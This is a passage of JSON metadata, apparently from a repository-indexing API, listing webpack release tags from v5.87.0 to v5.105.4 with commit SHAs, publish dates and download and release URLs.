13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpa